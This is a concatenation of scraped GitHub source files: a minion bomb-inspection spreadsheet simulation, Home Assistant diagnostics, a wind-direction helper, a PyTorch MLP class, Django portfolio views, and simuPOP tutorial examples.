Conveyor instance.\n\n Parameters:\n number_minions -- number of minions at the conveyor\n minions_qualific -- the probability of a correct answer minions.\n Is defined as a tuple = (right, wrong, skip)\n inspect -- number of minions, which should test the bomb\n filename -- xlsx file with bombs\n sheet -- sheet, where stored the bombs.\n \"\"\"\n self.number_minions = number_minions\n self.weights = minions_qualific\n self.inspect = inspect\n self.filename = filename\n self.sheet = sheet\n self.wb_manager = WorkbookManager(filename, sheet)\n self.bombs = [Bomb(*record) for record in\n self.wb_manager.get_bombs_data()]\n self.minions = [Minion(id, minions_qualific, self.wb_manager) for id in\n range(1, number_minions+1)]\n self.motivation_report = []\n self.qa_report = []\n self.percentage_correct = 0\n\n def run_conveyor(self):\n \"\"\" Starts circular conveyor \"\"\"\n count = 0\n while count <= len(self.bombs) / self.number_minions:\n from_box = self.number_minions * count\n to_box = self.number_minions * (count + 1)\n tape = self.bombs[from_box:to_box]\n for turn in xrange(self.inspect):\n for pos in xrange(len(tape)):\n self.minions[pos - turn].check_bomb(tape[pos])\n count += 1\n\n def generate_reports_and_salary(self):\n \"\"\" Generate qa report and motivation report\"\"\"\n correctly = 0.\n for bomb in self.bombs:\n # generate qa report\n answers = bomb.minions_stickers.values()\n yes = float(answers.count('yes'))\n quorum = 'yes' if yes / self.inspect > 0.5 else 'no'\n if quorum == 'yes':\n self.qa_report.append((bomb.id, 0))\n correctly += 1 if not bomb.is_broken else 0\n else:\n self.qa_report.append((bomb.id, 1))\n correctly += 1 if bomb.is_broken else 0\n # generate salary\n for minion, answer in bomb.minions_stickers.iteritems():\n if answer is None:\n minion.skips += 1\n continue\n elif answer == quorum:\n minion.bananas += 1\n else:\n minion.floggings += 1\n # generate motivation reports\n for minion in self.minions:\n self.motivation_report.append((minion.id, minion.bananas,\n minion.floggings, minion.skips))\n self.percentage_correct = correctly / len(self.bombs) * 100\n\n def write_reports(self):\n \"\"\" Writes a reports and log in xlsx file\"\"\"\n\n # write motivation report\n column_names = ['minion_id', 'bananas_cnt', 'flogging_cnt',\n 'bombs_skipped']\n data = self.motivation_report\n self.wb_manager.write_xslx('Motivation Report', column_names, data)\n\n # write qa report\n column_names = ['bomb_id', 'is_broken']\n self.wb_manager.write_xslx('QA Report', column_names, self.qa_report)\n\n # write percentage correct\n column_names = ['% correct']\n data = [(self.percentage_correct,)]\n self.wb_manager.write_xslx('% correct', column_names, data)\n\n # save in output file\n filename = self.filename\n ind = filename.find('.')\n output_file = filename[:ind] + '_output' + filename[ind:]\n self.wb_manager.wb.save(filename=output_file)\n\n\nclass Minion:\n \"\"\"\n Model describe minions.\n Minions can check bomb (method check_bomb).\n \"\"\"\n\n ANSWERS = (True, False, None)\n\n def __init__(self, id, weights, wb_manager):\n \"\"\"Initialize a Conveyor instance.\n\n Parameters:\n \"weights\" - show probability ANSWERS\n \"\"\"\n self.id = id\n self.weights = weights\n self.wb_manager = wb_manager\n self.bananas = 0\n self.floggings = 0\n self.skips = 0\n\n def check_bomb(self, bomb):\n decision = self.generate_decision(Minion.ANSWERS, self.weights)\n if decision is None:\n answer = None\n elif decision:\n answer = 'no' if bomb.is_broken else 'yes'\n else:\n answer = 'yes' if bomb.is_broken else 'no'\n bomb.minions_stickers[self] = answer\n self.wb_manager.minions_log((self.id, bomb.id, answer))\n\n @staticmethod\n def generate_decision(answers, weights):\n \"\"\"\n Generate minions decision, depends on possible answers and\n probability this answers\n \"\"\"\n total_weight = float(sum(weights))\n rel_weight = [w / total_weight for w in weights]\n\n # Probability for each element\n probs = [sum(rel_weight[:i + 1]) for i in range(len(rel_weight))]\n\n for (i, element) in enumerate(answers):\n if random() <= probs[i]:\n break\n return element\n\n\nclass WorkbookManager:\n def __init__(self, filename, sheet):\n self.wb = load_workbook(filename)\n self.bombs_sheet = sheet\n self.wb_output = Workbook(filename)\n self.log_sheet = self.wb.create_sheet(title='Log')\n self.row_cursor = 1\n\n def get_bombs_data(self):\n bombs_sheet = self.wb.get_sheet_by_name(self.bombs_sheet)\n for row in bombs_sheet.rows[1:]:\n yield [cell.value for cell in row]\n\n def write_xslx(self, sheet_name, column_names, data):\n title_row = 1\n ws = self.wb.create_sheet(title=sheet_name)\n for col, col_name in enumerate(column_names, 1):\n ws.cell(column=col, row=title_row, value=col_name)\n\n for row, record in enumerate(data, title_row + 1):\n for col, value in enumerate(record, 1):\n ws.cell(column=col, row=row, value=value)\n\n def minions_log(self, record):\n \"\"\"\n Write minion bomb check data to the file.\n \"\"\"\n column_names = ['minion_id', 'bomb_id', 'answer']\n if self.row_cursor == 1:\n for col, col_name in enumerate(column_names, 1):\n self.log_sheet.cell(column=col, row=self.row_cursor, value=col_name)\n self.row_cursor += 1\n for col, value in enumerate(record, 1):\n self.log_sheet.cell(row=self.row_cursor, column=col, value=value)\n self.row_cursor += 1\n\n\nif __name__ == '__main__':\n # parsing arguments\n import sys\n parser = argparse.ArgumentParser()\n parser.add_argument('-m', action='store', dest='minions',\n help='Number of minions on conveyor')\n parser.add_argument('-c', action='store', dest='correct', default=60,\n help='The probability of a correct answer. Defult=60')\n parser.add_argument('-s', action='store', dest='skip', default=10,\n help='The probability of a skip')\n parser.add_argument('-i', action='store', dest='inspect',\n help='Number of inspections each bomb')\n parser.add_argument('-file', action='store', dest='file',\n default='bombs.xlsx', help='Xlsx file with bombs')\n parser.add_argument('-sheet', action='store', dest='sheet', default='Bombs',\n help='Shee with bombs in xlsx file')\n args = parser.parse_args()\n\n correct = float(args.correct) / 10\n skip = float(args.skip) / 10\n if correct + skip > 100:\n sys.exit('The sum of probabilities of correct and skip must be < 100')\n if not args.minions or not args.inspect:\n sys.exit('Number of minions and inspections is required')\n minions = int(args.minions)\n inspect = int(args.inspect)\n if minions < inspect:\n sys.exit('Number of inspections can\\'t be more then minions')\n qualific = (correct, 10 - correct - skip, skip)\n\n # program execution\n conveyor = Conveyor(\n minions,\n qualific,\n inspect,\n args.file,\n args.sheet\n )\n conveyor.run_conveyor()\n conveyor.generate_reports_and_salary()\n conveyor.write_reports()\n","repo_name":"Begun-A/Conveyor","sub_path":"conveyor.py","file_name":"conveyor.py","file_ext":"py","file_size_in_byte":8662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32190165511","text":"\"\"\"Diagnostics support for Smart Irrigation.\"\"\"\nfrom __future__ import annotations\nimport json\nimport logging\n\nfrom typing import Any\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom . import const\n\n_LOGGER = logging.getLogger(__name__)\n\nasync def async_get_config_entry_diagnostics(\n hass: HomeAssistant, config_entry: ConfigEntry\n) -> dict[str, Any]:\n \"\"\"Return diagnostics for a config entry.\"\"\"\n storagedata = \"\"\n try:\n store = hass.data[const.DOMAIN][\"coordinator\"].store\n storagefile = store._store.path\n with open(storagefile) as f:\n data = json.load(f)\n storagedata = data.get('data')\n except:\n _LOGGER.error(\"unable to load storage file to generate diagnostics.\")\n config_entry_info = config_entry.as_dict()\n if \"data\" in config_entry_info and \"owm_api_key\" in config_entry_info[\"data\"]:\n config_entry_info[\"data\"][\"owm_api_key\"] = \"XXXXXXXX\"\n if \"options\" in config_entry_info and \"owm_api_key\" in config_entry_info[\"options\"]:\n config_entry_info[\"options\"][\"owm_api_key\"]= \"XXXXXXXXXXX\"\n diag: dict[str, Any] = {\"config\": config_entry_info, \"storage\": storagedata}\n return diag\n","repo_name":"jeroenterheerdt/HAsmartirrigation","sub_path":"custom_components/smart_irrigation/diagnostics.py","file_name":"diagnostics.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":252,"dataset":"github-code","pt":"34"} +{"seq_id":"24849147355","text":"from typing import Final\r\n\r\nDIRECTION_NAME: Final[list[str]] = [\r\n \"N\",\r\n \"NNE\",\r\n \"NE\",\r\n \"ENE\",\r\n \"E\",\r\n \"ESE\",\r\n \"SE\",\r\n \"SSE\",\r\n \"S\",\r\n \"SSW\",\r\n \"SW\",\r\n \"WSW\",\r\n \"W\",\r\n \"WNW\",\r\n \"NW\",\r\n \"NNW\",\r\n \"N\",\r\n]\r\n\r\n\r\ndef degree_to_direction(degree: int) -> str:\r\n # 북에서 다시 북으로, 360으로 나누면서 index로 계산\r\n return DIRECTION_NAME[round((degree % 360) / 22.5)]\r\n","repo_name":"item4/yui","sub_path":"yui/apps/weather/wind.py","file_name":"wind.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"ko","doc_type":"code","stars":30,"dataset":"github-code","pt":"34"} +{"seq_id":"35885117271","text":"import sys\nsys.path.insert(1, '..')\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport honors_work.data as data\nimport honors_work.utils as utils\nimport torch.nn.functional as F\nimport numpy as np\n\nclass Models(nn.Module):\n \"\"\"This class contains the attributes that all models have in common.\n All models will inherit from this class \n \n ...\n Parameters (Not Attributes)\n ---------------------------\n cuda : bool\n If True, the model will train using GPU acceleration if a CUDA\n GPU is available. If False, the model will train on CPU\n \n Attributes\n ----------\n loss : str\n The loss function for the model. Options are {'L1', 'MSE', \n 'CrossEntropy'}.\n dataset : str\n The dataset that the model will be trained on. Options are \n {'MNIST'}.\n cuda : bool\n If True, the model will train using GPU acceleration if a CUDA\n GPU is available. If False, the model will train on CPU\n \"\"\"\n \n def __init__(self, loss, dataset, cuda):\n super(Models, self).__init__()\n \n loss_functions = {'L1': nn.L1Loss(), \n 'MSE': nn.MSELoss(), \n 'CrossEntropy': nn.CrossEntropyLoss()}\n \n datasets = {'MNIST' : data.MNIST()}\n \n self.loss = loss_functions[loss]\n self.data = datasets[dataset]\n \n if cuda and torch.cuda.is_available():\n self.device = torch.device('cuda')\n else:\n self.device = torch.device('cpu') \n \n \nclass MultilayerPerceptron(Models):\n \"\"\"A Multilayer Perceptron with a single hidden layer of variable size\n \n ...\n Parameters (Not Attributes)\n ---------------------------\n cuda : bool\n If True, the model will train using GPU acceleration if a CUDA\n GPU is available. If False, the model will train on CPU\n \n Attributes\n ----------\n loss : str\n The loss function for the model. Options are {'L1', 'MSE',\n 'CrossEntropy'}.\n dataset : str\n The dataset that the model will be trained on. Options are\n {'MNIST'}.\n optim : str\n The optimizer that the model will use while training. Options are\n {'SGD'} \n param_counts : np.array \n List of parameter counts that the model will be trained over.\n Since this model is an MLP, these counts correspond to N*10^3 \n neurons for a parameter count, N.\n current_count : int\n The index of the current parameter count in param_counts\n losses : dict\n Dictionary of lists of final losses for each model that \n is trained at each parameter count\n scheduler : \n \"\"\"\n \n def __init__(self, loss='MSE', dataset='MNIST', cuda=False, optimizer='SGD'):\n super(MultilayerPerceptron, self).__init__(loss, dataset, cuda)\n \n self.param_counts = np.array([1, 2, 3])\n self.current_count = 0\n self.input_layer = nn.Linear(self.data.data_x_dim * self.data.data_y_dim, \n self.param_counts[self.current_count]*10**3)\n self.hidden_layer = nn.Linear(self.param_counts[self.current_count]*10**3, 10)\n# self.mlp_optim = optim.SGD([self.input_layer.weight, self.hidden_layer.weight], lr=.01, \n# momentum=0.95)\n# self.scheduler = optim.lr_scheduler.StepLR(self.mlp_optim, step_size=500, gamma=0.1)\n self.losses = {'train': np.array([]), 'test': np.array([])}\n \n def forward(self, x):\n x = x.view(-1, self.data.data_x_dim * self.data.data_y_dim)\n x = F.relu(self.input_layer(x))\n x = F.relu(self.hidden_layer(x))\n return x\n \n\n \n \n \n","repo_name":"johnmath/DoubleDescentTestbed","sub_path":".ipynb_checkpoints/models-checkpoint.py","file_name":"models-checkpoint.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26040325167","text":"import matplotlib\nimport datetime\n\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom matplotlib import pyplot as plt\n\nfrom .models import Post\nfrom .models import Projeto\nfrom .models import Cadeira\nfrom .models import PontuacaoQuizz\nfrom .models import TFC\n\nfrom .forms import PostForm\nfrom .forms import ProjetoForm\nfrom .forms import CadeiraForm\nfrom .forms import TFCForm\n\nfrom django.shortcuts import render, HttpResponseRedirect, reverse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\n\nmatplotlib.use('Agg')\n\n\n# Create your views here.\ndef home_page_view(request):\n agora = datetime.datetime.now()\n context = {\n 'hora': agora.hour,\n }\n\n return render(request, 'portfolio/home.html', context)\n\ndef licenciatura_page_view(request):\n context = {'cadeiras': Cadeira.objects.all()}\n return render(request, 'portfolio/licenciatura.html', context)\n\ndef projetos_page_view(request):\n context = {'projetos': Projeto.objects.all()}\n return render(request, 'portfolio/projetos.html', context)\n\ndef blog_page_view(request):\n context = {'portfolio': Post.objects.all()}\n return render(request, 'portfolio/blog.html', context)\n\ndef tfc_page_view(request):\n context = {'trabalhos': TFC.objects.all()}\n return render(request, 'portfolio/tfc.html', context)\n\ndef quizz(request):\n if request.method == 'POST':\n n = request.POST['nome']\n p = pontuacao_quizz(request)\n r = PontuacaoQuizz(nome=n, pontos=p)\n r.save()\n\n desenha_grafico_resultados(request)\n return render(request, 'portfolio/quizz.html')\n\ndef pontuacao_quizz(request):\n pontuacao = 0\n if request.POST['primeira'] == \"Cascading Style Sheets\":\n pontuacao += 1\n\n if request.POST['segunda'] == \"HyperText Markup Language\":\n pontuacao += 1\n\n if request.POST['terceira'] == \"Marcadores\":\n pontuacao += 1\n\n if request.POST['quarta'] == \"Estruturar o conteúdo de uma página web\":\n pontuacao += 1\n\n if request.POST['quinta'] == \"Estilizar o conteúdo da página web.\":\n pontuacao += 1\n\n return pontuacao\n\ndef desenha_grafico_resultados(request):\n pontuacoes = PontuacaoQuizz.objects.all()\n pontuacao_sorted = sorted(pontuacoes, key=lambda objeto: objeto.pontos, reverse=False)\n listaNomes = []\n listapontuacao = []\n\n for person in pontuacao_sorted:\n listaNomes.append(person.nome)\n listapontuacao.append(person.pontos)\n\n plt.barh(listaNomes, listapontuacao)\n plt.savefig('portfolio/static/portfolio/images/resultados.png', bbox_inches='tight')\n\ndef novo_topico_view(request):\n form = PostForm(request.POST or None)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portfolio:blog'))\n\n context = {'form': form}\n return render(request, 'portfolio/novo.html', context)\n\ndef edita_topico_view(request, topico_id):\n topico = Post.objects.get(id=topico_id)\n form = PostForm(request.POST or None, instance=topico)\n\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portfolio:blog'))\n\n context = {'form': form, 'topico_id': topico_id}\n return render(request, 'portfolio/edita.html', context)\n\ndef apaga_topico_view(request, topico_id):\n Post.objects.get(id=topico_id).delete()\n return HttpResponseRedirect(reverse('portfolio:blog'))\n\ndef novo_projeto_view(request):\n form = ProjetoForm(request.POST or None)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portfolio:projetos'))\n\n context = {'form': form}\n return render(request, 'portfolio/novo.html', context)\n\ndef editar_projeto_view(request, topico_id):\n topico = Projeto.objects.get(id=topico_id)\n form = ProjetoForm(request.POST or None, instance=topico)\n\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portfolio:projetos'))\n\n context = {'form': form, 'topico_id': topico_id}\n return render(request, 'portfolio/editar_projeto.html', context)\n\ndef apagar_projeto_view(request, topico_id):\n Projeto.objects.get(id=topico_id).delete()\n return HttpResponseRedirect(reverse('portfolio:projetos'))\n\ndef novo_cadeira_view(request):\n form = CadeiraForm(request.POST or None)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portfolio:licenciatura'))\n\n context = {'form': form}\n return render(request, 'portfolio/novo_cadeira.html', context)\n\ndef editar_cadeira_view(request, topico_id):\n topico = Cadeira.objects.get(id=topico_id)\n form = CadeiraForm(request.POST or None, instance=topico)\n\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portfolio:licenciatura'))\n\n context = {'form': form, 'topico_id': topico_id}\n return render(request, 'portfolio/editar_licenciatura.html', context)\n\ndef apagar_cadeira_view(request, topico_id):\n Cadeira.objects.get(id=topico_id).delete()\n return HttpResponseRedirect(reverse('portfolio:licenciatura'))\n\ndef novo_tfc_view(request):\n form = TFCForm(request.POST or None)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portfolio:tfc'))\n\n context = {'form': form}\n return render(request, 'portfolio/novo.html', context)\n\ndef editar_tfc_view(request, topico_id):\n topico = TFC.objects.get(id=topico_id)\n form = TFCForm(request.POST or None, instance=topico)\n\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portfolio:tfc'))\n\n context = {'form': form, 'topico_id': topico_id}\n return render(request, 'portfolio/editar_tfc.html', context)\n\ndef apagar_tfc_view(request, topico_id):\n TFC.objects.get(id=topico_id).delete()\n return HttpResponseRedirect(reverse('portfolio:tfc'))\n\ndef login_view(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(\n request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse('portfolio:home'))\n else:\n return render(request, 'portfolio/login.html', {\n 'message': 'Credenciais invalidas.'\n })\n\n return render(request, 'portfolio/login.html')\n\ndef logout_view(request):\n logout(request)\n\n return render(request, 'portfolio/login.html', {\n 'message': 'Foi desconetado.'\n })\n\ndef sobremim_view(request):\n return render(request,'portfolio/sobremim.html')\n\ndef projetos_geral_view(request):\n return render(request,'portfolio/projetos_geral.html')\n\ndef web_view(request):\n return render(request,'portfolio/web.html')\n\ndef tec_view(request):\n return render(request,'portfolio/tec.html')\n\ndef labs_view(request):\n return render(request, 'portfolio/labs.html')\n\ndef sobre_portfolio_view(request):\n return render(request, 'portfolio/sobreportfolio.html')\n\ndef contactos_view(request):\n return render(request, 'portfolio/contactos.html')\n\ndef noticias_view(request):\n return render(request, 'portfolio/noticias.html')\n\ndef curiosidadess_view(request):\n return render(request, 'portfolio/curiosidades.html')","repo_name":"joaobernardino-22003183/portfolio","sub_path":"portfolio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71334492899","text":"#!/usr/bin/env python\n\n#begin_file log/importSimuPOP.py\nimport simuOpt\nsimuOpt.setOptions(optimized=False, alleleType='long', quiet=False)\nimport simuPOP as sim\n#end_file\n\n#begin_file log/standard.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n#expect_error\npop = sim.Population(10, loci=2)\npop.locusPos(10)\npop.individual(20).setAllele(1, 0)\n#end_file\n\n#begin_file log/simpleExample.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=1000, loci=2)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 2, 2, 1])\n ],\n matingScheme=sim.RandomMating(ops=sim.Recombinator(rates=0.01)),\n postOps=[\n sim.Stat(LD=[0, 1], step=10),\n sim.PyEval(r\"'%.2f\\n' % LD[0][1]\", step=10),\n ],\n gen=100\n)\n#end_file\n\n#begin_file log/help.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nhelp(sim.Population.addInfoFields)\n#end_file\n\n#begin_file log/absIndex.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[10, 20], loci=[5, 7])\nprint(pop.chromLocusPair(7))\nprint(pop.absLocusIndex(1, 1))\nprint(pop.absIndIndex(2, 1))\nprint(pop.subPopIndPair(25))\n#end_file\n\n#begin_file log/iterator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2, loci=[5, 6])\nsim.initGenotype(pop, freq=[0.2, 0.3, 0.5])\nfor ind in pop.individuals():\n for loc in range(pop.chromBegin(1), pop.chromEnd(1)):\n print(ind.allele(loc))\n\n#end_file\n\n#begin_file log/defdict.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([100]*2, loci=1)\nsim.initGenotype(pop, freq=[0, 0.2, 0.8], subPops=0)\nsim.initGenotype(pop, freq=[0.2, 0.8], subPops=1)\nsim.stat(pop, alleleFreq=0, vars=['alleleFreq_sp'])\nfor sp in range(2):\n print('Subpop %d (with %d alleles): ' % (sp, len(pop.dvars(sp).alleleFreq[0])))\n for a in range(3):\n print('%.2f ' % pop.dvars(sp).alleleFreq[0][a])\n\n#end_file\n\n\n#begin_file log/userFunc.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(1000, loci=1, infoFields='smoking')\nsim.initInfo(pop, lambda:random.randint(0,1), infoFields='smoking')\nsim.initGenotype(pop, freq=[0.3, 0.7])\n\n# a penetrance function that depends on smoking\ndef func(geno, smoking):\n if smoking:\n return (geno[0]+geno[1])*0.4\n else:\n return (geno[0]+geno[1])*0.1\n\nsim.pyPenetrance(pop, loci=0, func=func)\nsim.stat(pop, numOfAffected=True)\nprint(pop.dvars().numOfAffected)\n\n#end_file\n\n#begin_file log/WithArgs.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(1000, loci=1, infoFields=('x', 'y'))\nsim.initInfo(pop, lambda:random.randint(0,1), infoFields=('x', 'y'))\nsim.initGenotype(pop, freq=[0.3, 0.7])\n\n# a penetrance function that depends on unknown information fields\ndef func(*fields):\n return 0.4*sum(fields)\n\n# function WithArgs tells PyPenetrance that func accepts fields x, y so that\n# it will pass values at fields x and y to func.\nsim.pyPenetrance(pop, loci=0, func=sim.WithArgs(func, pop.infoFields()))\nsim.stat(pop, numOfAffected=True)\nprint(pop.dvars().numOfAffected)\n#end_file\n\n#begin_file log/genoStru.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2, 3], ploidy=2, loci=[5, 10],\n lociPos=list(range(0, 5)) + list(range(0, 20, 2)), chromNames=['Chr1', 'Chr2'],\n alleleNames=['A', 'C', 'T', 'G'])\n# access genotypic information from the sim.Population\npop.ploidy()\npop.ploidyName()\npop.numChrom()\npop.locusPos(2)\npop.alleleName(1)\n# access from an individual\nind = pop.individual(2)\nind.numLoci(1)\nind.chromName(0)\nind.locusName(1)\n# utility functions\nind.chromBegin(1)\nind.chromByName('Chr2')\n# loci pos can be unordered within each chromosome\npop = sim.Population(loci=[2, 3], lociPos=[3, 1, 1, 3, 2],\n lociNames=['loc%d' % x for x in range(5)])\npop.lociPos()\npop.lociNames()\n#end_file\n\n#begin_file log/haplodiploid.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2,5], ploidy=sim.HAPLODIPLOID, loci=[3, 5])\nsim.initGenotype(pop, freq=[0.3, 0.7])\nsim.dump(pop)\n#end_file\n\n#begin_file log/chromType.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=6, ploidy=2, loci=[3, 3, 3, 2, 2, 4, 4],\n chromTypes=[sim.AUTOSOME]*2 + [sim.CHROMOSOME_X, sim.CHROMOSOME_Y, sim.MITOCHONDRIAL]\n + [sim.CUSTOMIZED]*2)\nsim.initGenotype(pop, freq=[0.3, 0.7])\nsim.dump(pop, structure=False) # does not display genotypic structure information\n#end_file\n\n#begin_file log/infoField.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10, loci=[20], ancGen=1,\n infoFields=['father_idx', 'mother_idx'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*20+[1]*20)\n ],\n matingScheme=sim.RandomMating(\n ops=[\n sim.Recombinator(rates=0.01),\n sim.ParentsTagger()\n ]\n ),\n gen = 1\n)\npop.indInfo('mother_idx') # mother of all offspring\nind = pop.individual(0)\nmom = pop.ancestor(ind.mother_idx, 1)\nprint(ind.genotype(0))\nprint(mom.genotype(0))\nprint(mom.genotype(1))\n#end_file\n\n#begin_file log/individual.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([5, 4], loci=[2, 5], infoFields='x')\n# get an individual\nind = pop.individual(3)\nind.ploidy() # access to genotypic structure\nind.numChrom()\nind.affected()\nind.setAffected(True) # access affection sim.status,\nind.sex() # sex,\nind.setInfo(4, 'x') # and information fields\nind.x = 5 # the same as ind.setInfo(4, 'x')\nind.info('x') # get information field x\nind.x # the same as ind.info('x')\n#end_file\n\n#begin_file log/individualGenotype.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2, 1], loci=[2, 5])\nfor ind in pop.individuals(1):\n for marker in range(pop.totNumLoci()):\n ind.setAllele(marker % 2, marker, 0)\n ind.setAllele(marker % 2, marker, 1)\n print('%d %d ' % (ind.allele(marker, 0), ind.allele(marker, 1)))\n\nind = pop.individual(1)\ngeno = ind.genotype(1) # the second homologous copy\ngeno\ngeno[2] = 3\nind.genotype(1)\ngeno[2:4] = [3, 4] # direct modification of the underlying genotype\nind.genotype(1)\n# set genotype (genotype, ploidy, chrom)\nind.setGenotype([2, 1], 1, 1)\ngeno\n#\ngeno.count(1) # count\ngeno.index(2) # index \nind.setAllele(5, 3) # change underlying genotype using setAllele\nprint(geno) # geno is change\nprint(geno) # but not geno\ngeno[2:5] = 4 # can use regular Python slice operation\nprint(ind.genotype())\n#end_file\n\n\n#begin_file log/subPop.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[3, 4, 5], ploidy=1, loci=1, infoFields='x')\n# individual 0, 1, 2, ... will have an allele 0, 1, 2, ...\npop.setGenotype(range(pop.popSize()))\n#\npop.subPopSize(1)\n# merge subpopulations\npop.mergeSubPops([1, 2])\n# split subpopulations\npop.splitSubPop(1, [2, 7])\npop.subPopSizes()\n# remove subpopulations\npop.removeSubPops(1)\npop.subPopSizes()\n#end_file\n\n#begin_file log/subPopName.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[3, 4, 5], subPopNames=['x', 'y', 'z'])\npop.removeSubPops([1])\npop.subPopNames()\npop.subPopByName('z')\npop.splitSubPop(1, [2, 3])\npop.subPopNames()\npop.setSubPopName('z-1', 1)\npop.subPopNames()\npop.subPopByName('z')\n#end_file\n\n#begin_file log/virtualSplitter.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=[200, 400], loci=[30], infoFields='x')\n# assign random information fields\nsim.initSex(pop)\nsim.initInfo(pop, lambda: random.randint(0, 3), infoFields='x')\n# define a virtual splitter by sex\npop.setVirtualSplitter(sim.SexSplitter())\npop.numVirtualSubPop() # Number of defined VSPs\npop.subPopName([0, 0]) # Each VSP has a name\npop.subPopSize([0, 1]) # Size of VSP 1 in subpopulation 0\npop.subPopSize([0, 'Female']) # Refer to vsp by its name\n# define a virtual splitter by information field 'x'\npop.setVirtualSplitter(sim.InfoSplitter(field='x', values=[0, 1, 2, 3]))\npop.numVirtualSubPop() # Number of defined VSPs\npop.subPopName([0, 0]) # Each VSP has a name\npop.subPopSize([0, 0]) # Size of VSP 0 in subpopulation 0\npop.subPopSize([1, 0]) # Size of VSP 0 in subpopulation 1\n#end_file\n\n#begin_file log/virtualSubPop.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(10, loci=[2, 3], infoFields='Sex')\nsim.initSex(pop)\npop.setVirtualSplitter(sim.SexSplitter())\n# initialize male and females with different genotypes. \nsim.initGenotype(pop, genotype=[0]*5, subPops=[(0, 0)])\nsim.initGenotype(pop, genotype=[1]*5, subPops=[(0, 1)])\n# set Sex information field to 0 for all males, and 1 for all 